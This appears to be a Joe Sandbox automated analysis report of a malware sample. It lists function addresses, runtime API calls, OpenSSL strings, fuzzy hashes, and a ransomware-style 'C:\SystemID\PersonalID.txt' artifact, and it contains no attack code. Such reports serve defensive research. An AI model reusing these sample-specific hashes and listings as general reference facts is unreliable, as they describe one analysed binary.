                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction ID: 4104e716c17c218175c20b4b97f44982a419429ef32eff9de5d305485f38f937
                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction Fuzzy Hash: 0C01DB3240420ABBCF126F55CD02FDA7F66EF48754F154019F91866121D375E961EFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F25007: __getptd_noexit.LIBCMT ref: 00F25008
                                                                                                          • Part of subcall function 00F25007: __amsg_exit.LIBCMT ref: 00F25015
                                                                                                        • __calloc_crt.LIBCMT ref: 00F25A01
                                                                                                          • Part of subcall function 00F28C96: __calloc_impl.LIBCMT ref: 00F28CA5
                                                                                                        • __lock.LIBCMT ref: 00F25A37
                                                                                                        • ___addlocaleref.LIBCMT ref: 00F25A43
                                                                                                        • __lock.LIBCMT ref: 00F25A57
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580527540-0
                                                                                                        • Opcode ID: 372fe2eeba3f967940f19479b80359ae9d4a03d5b5670f4c0e2ce736456f29a4
                                                                                                        • Instruction ID: 59fb643cf3d12f71fb5e1ff8149873b557500bcf83684558f3e0b80bc25b814b
                                                                                                        • Opcode Fuzzy Hash: 372fe2eeba3f967940f19479b80359ae9d4a03d5b5670f4c0e2ce736456f29a4
                                                                                                        • Instruction Fuzzy Hash: 2A014071542760DBD720FFA8AC47B1D77A09F41B70F204249F4A59B2C6CE7C5941AE61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction ID: 7c93822a8e8361be5410d0815428ab0454b69d9eedb2169958fe2846d72ece10
                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction Fuzzy Hash: C5010B7240028EBBCF125E84CC428EE3F66BB29355B588455FE1959131DA3AC9B2BB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32 ref: 00F127B9
                                                                                                        • _malloc.LIBCMT ref: 00F127C3
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _memset.LIBCMT ref: 00F127CE
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00F127E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        • Opcode ID: 600be51b88979aec4da7ca858aaa2ac7709273239a820d51b4bebf7e68b94b1c
                                                                                                        • Instruction ID: 5481b668a73567dc619dd80d4328b77facc961f625e47bf310278129a7b8f37d
                                                                                                        • Opcode Fuzzy Hash: 600be51b88979aec4da7ca858aaa2ac7709273239a820d51b4bebf7e68b94b1c
                                                                                                        • Instruction Fuzzy Hash: B2F02736741218BBE72066659C4BFBB769DEB86760F100125FA08E32C2E9512D0162F1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32 ref: 00F12806
                                                                                                        • _malloc.LIBCMT ref: 00F12814
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _memset.LIBCMT ref: 00F1281F
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00F12832
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        • Opcode ID: 49ca3a25eb0387db2fd7676c3bf4e80c37e6a1f1fea7debb7a1930e89fba4874
                                                                                                        • Instruction ID: a2fd588b7da28768136578c002897ce66fb393c9231cf9b7272121b5bdaa8fc6
                                                                                                        • Opcode Fuzzy Hash: 49ca3a25eb0387db2fd7676c3bf4e80c37e6a1f1fea7debb7a1930e89fba4874
                                                                                                        • Instruction Fuzzy Hash: 23E086767411387BE51023597C8FFAB761CCBC27A5F100115F615D22D38A951C0191F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 7274dd55b2795a4d55dda06616a4e096840f958fa2f130b09d8e6d8a83dee166
                                                                                                        • Instruction ID: 84e07fe87bfb8f5849557691ff2845cd6c88e1ba9c75b7e1d0e0720b0cf60b88
                                                                                                        • Opcode Fuzzy Hash: 7274dd55b2795a4d55dda06616a4e096840f958fa2f130b09d8e6d8a83dee166
                                                                                                        • Instruction Fuzzy Hash: 69C13671704209DBCB28CF58D8C0AAAB3B6FFC4300B20456DE8468B655DB35FD95EBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                        • Opcode ID: 2c9179d40682a4d09fff1dc415321e145c3dd6cefb48c4a1e40ae628d3079eca
                                                                                                        • Instruction ID: 9e38d0290b12d8afd63bfc5b62e81c3d0a49f39ac32db45a2fb9cd1f34f7af79
                                                                                                        • Opcode Fuzzy Hash: 2c9179d40682a4d09fff1dc415321e145c3dd6cefb48c4a1e40ae628d3079eca
                                                                                                        • Instruction Fuzzy Hash: 3751C471B44306A7E7306EA6AC82F777798DF41B74F04442AFA1CD5182EEA5E844B273
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2590308727-54166481
                                                                                                        • Opcode ID: 40ad24ee2cc86d14dd1d2979b71b077cd0dd22ab0391f2e53f42af94dc62a7a2
                                                                                                        • Instruction ID: e5f3494143be851e813bf518c7325089e72ba3ceb1eaa85313947a02e077b404
                                                                                                        • Opcode Fuzzy Hash: 40ad24ee2cc86d14dd1d2979b71b077cd0dd22ab0391f2e53f42af94dc62a7a2
                                                                                                        • Instruction Fuzzy Hash: D1110172E003199BDF30DF68DC5279E7BA0AF00324F040629FD5A52291E37A9958BBC3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F80686
                                                                                                          • Part of subcall function 00F54C00: _raise.LIBCMT ref: 00F54C18
                                                                                                        Strings
                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00F8062E
                                                                                                        • .\crypto\evp\digest.c, xrefs: 00F80638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset_raise
                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                        • Opcode ID: 1d5acb652bc8bc382f70852adb436bcd2c9d07370a62d4e2490ea12c068e3258
                                                                                                        • Instruction ID: c5ff984e5b646c52aa5c02cc12ab59ee75b927d00e80bf515e34967094be663e
                                                                                                        • Opcode Fuzzy Hash: 1d5acb652bc8bc382f70852adb436bcd2c9d07370a62d4e2490ea12c068e3258
                                                                                                        • Instruction Fuzzy Hash: 66014F756002009FD311EF08EC42E55B7E5AFC8314F154468F688D7262EB61EC559B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%